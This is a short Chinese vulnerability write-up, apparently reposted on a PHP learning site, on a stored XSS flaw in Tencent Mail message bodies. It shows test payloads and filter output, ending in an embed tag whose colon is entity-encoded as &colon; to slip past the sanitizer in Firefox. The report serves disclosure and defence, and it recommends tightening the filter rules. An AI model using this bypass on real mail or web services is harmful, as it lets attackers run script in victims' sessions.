腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p-自学php网

主页 > 后端 > 网站安全 >

腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p

来源：自学PHP网时间：2015-04-16 23:15 作者：阅读:次

[导读] 邮件正文的跨站脚本过滤规则不完善导致被绕过。测试1:embed src=javascript：alert(3)结果1：embed invokeurls=false allownetworking=none allowscriptaccess=never type=application x-shock...

邮件正文的跨站脚本过滤规则不完善导致被绕过。

测试1:

<embed src="javascript：alert(3)">

结果1：

<embed invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

尽量将测试内容最小化，找出问题根源。测试2：

<embed src="javascript">

结果2:

<embed src="javascript" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash"></div>

确定伪协议后面的":"触发了过滤规则。实体编码之。测试3:

<embed src="javascript&colon;alert(2)">

结果3:

<embed src="javascript：alert(2)" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

PS：该XSS Vector仅在Firefox下有效

测试与FF29.0.1

修复方案：

完善过滤规则

数据加密在嵌入式系统升级中的应用 - 网站安全

51信用卡管家任意用户密码修改 - 网站安全 - 自学

最新评论

加载更多~~

添加评论

更多文章推荐

微软服务器操作系统Longhorn公测 - Windows操作系统 2015-04-17
单点登录系统的安全 - 网站安全 - 自学php 2015-04-17
百度文库及某论坛的存储XSS - 网站安全 - 自学 2015-04-17
七大Windows系统故障解析 - Windows操作系统 - 自学 2015-04-17
126disk及XX@mail.ru和PageAdmin XSS 漏洞 - 网站安全 - 自 2015-04-17
URP通杀第二弹（短小精悍的小题目） - 网站安全 2015-04-16
mysql高级渗透经验 - 网站安全 - 自学php 2015-04-17
upfile 又一奇迹般的突破 - 网站安全 - 自学php 2015-04-17
江民杀毒台湾网站留言XSS - 网站安全 - 自学php 2015-04-17
李白白之Cross Site Scripting (XSS) attack - 网站安全 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论